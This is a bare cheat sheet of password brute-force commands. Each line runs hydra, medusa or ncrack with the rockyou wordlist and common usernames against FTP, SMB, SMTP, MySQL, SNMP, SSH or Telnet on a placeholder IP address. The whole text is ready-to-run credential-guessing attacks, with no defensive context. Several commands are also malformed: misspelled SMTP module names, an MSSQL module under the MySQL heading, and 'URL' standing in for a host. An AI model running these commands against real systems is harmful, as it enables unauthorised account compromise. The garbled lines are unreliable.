########################## PASSWORD ATTACK ################################################################
########################## TESTS PASSWORD #################################################################
########################## FTP SERVER #####################################################################

# hydra FTP
hydra -t 1 -V -f -l Anonymous -P /usr/share/wordlists/rockyou.txt IP_ADDRESS ftp

# Medusa
medusa -h IP_ADDRESS -u Anonymous -P /usr/share/wordlists/rockyou.txt -M ftp

# ncrack
ncrack -p 21 --user Anonymous -P /usr/share/wordlists/rockyou.txt IP_ADDRESS

########################## SMB SERVER #####################################################################

# hydra SMB
hydra -t 1 -V -f -l admin -P /usr/share/wordlists/rockyou.txt IP_ADDRESS smb

# Medusa
medusa -h IP_ADDRESS -u admin -P /usr/share/wordlists/rockyou.txt -M smbnt

########################## SMTP SERVER ####################################################################

# hydra SMTP
hydra -t 1 -V -f -l admin -P /usr/share/wordlists/rockyou.txt IP_ADDRESS smsmtp

# Medusa
medusa -h IP_ADDRESS -u admin -P /usr/share/wordlists/rockyou.txt -M snmtp

########################## MYSQL SERVER ####################################################################

# hydra MYSQL
hydra -t 1 -V -f -L /usr/share/wordlists/others/names.txt -P /usr/share/wordlists/rockyou.txt URL mysql

# Medusa
medusa -h IP_ADDRESS -u admin -P /usr/share/wordlists/rockyou.txt -M mssql

########################## SNMP SERVER #####################################################################

# hydra SNMP
# hydra -P /usr/share/wordlists/rockyou.txt -v IP_ADDRESS snmp

# Medusa
medusa -h IP_ADDRESS -u admin -P /usr/share/wordlists/rockyou.txt -M snmp

########################## SSH #############################################################################
# hydra SSH
hydra -v -V -u -L /usr/share/wordlists/others/names.txt -P /usr/share/wordlists/rockyou.txt -t 1 -u IP_ADDRESS ssh

# Medusa
medusa -h IP_ADDRESS -u admin -P /usr/share/wordlists/rockyou.txt -M ssh

# ncrack
ncrack -p 22 --user root -P passwords.txt IP_ADDRESS -T 5

########################## TELNET #########################################################################
# hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt -t 32 IP_ADDRESS telnet

# ncrack
ncrack -p 23 --user root -P /usr/share/wordlists/rockyou.txt IP_ADDRESS -T 5

# Medusa
medusa -u root -P /usr/share/wordlists/rockyou.txt -h IP_ADDRESS -M telnet